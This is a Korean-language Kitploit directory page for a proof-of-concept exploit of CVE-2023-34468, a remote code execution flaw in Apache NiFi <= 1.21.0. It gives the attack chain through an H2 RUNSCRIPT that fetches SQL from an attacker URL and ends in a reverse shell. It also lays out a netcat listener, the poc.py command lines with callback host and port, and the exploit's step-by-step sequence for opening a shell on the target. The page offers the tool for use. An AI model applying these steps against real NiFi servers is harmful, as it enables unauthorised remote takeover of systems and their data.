Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-34468-POC — CVE-2023-34468 — Apache NiFi <= 1.21.0에서 H2 RUNSCRIPT를 통한 RCE에 대한 PoC 익스플로잇 | Kitploit
도구/GitHubGitHub/sbouabid-sec/cve-2023-34468-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubsbouabid-sec/cve-2023-34468-poc

CVE-2023-34468-POC

CVE-2023-34468 — Apache NiFi <= 1.21.0에서 H2 RUNSCRIPT를 통한 RCE에 대한 PoC 익스플로잇

저장소 보기
424개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Apache NiFi <= 1.21.0에서 H2 데이터베이스 RUNSCRIPT를 통한 원격 코드 실행


취약점

Apache NiFi는 기본적으로 번들로 제공되는 H2 데이터베이스 JAR을 포함하고 있습니다. DBCPConnectionPool 컨트롤러 서비스는 이 H2 드라이버를 사용하도록 구성할 수 있습니다. H2는 원격 URL에서 SQL 파일을 가져와 실행하는 RUNSCRIPT 문을 지원합니다. 해당 SQL 파일은 CREATE ALIAS를 통해 임의의 Java 코드를 정의하고 서버 OS에서 실행할 수 있습니다.

공격 체인:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

영향을 받는 버전

소프트웨어버전
Apache NiFi<= 1.21.0
수정된 버전1.21.1+
Java모든 (번들)

요구 사항

  • Python 3.x
  • requests 라이브러리 → pip install requests
  • 익명 쓰기 접근 또는 유효한 자격 증명이 있는 NiFi 타겟
  • 타겟에서 사용자 머신까지의 네트워크 접근 (리버스 셸 콜백용)

사용법

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

인자


설정

터미널 1 — 리스너:

root@kitploit:~
nc -lvnp 4444

터미널 2 — 익스플로잇:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

PoC의 동작 방식

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
도구 다운로드
인자기본값설명
--targethttp://NiFi.target.comNiFi 기본 URL
--lhost10.10.10.10사용자 IP (tun0)
--lport4444리버스 셸 수신 포트
--http-port80rce.sql 제공 포트
--cleanupFalse실행 후 생성된 아티팩트 삭제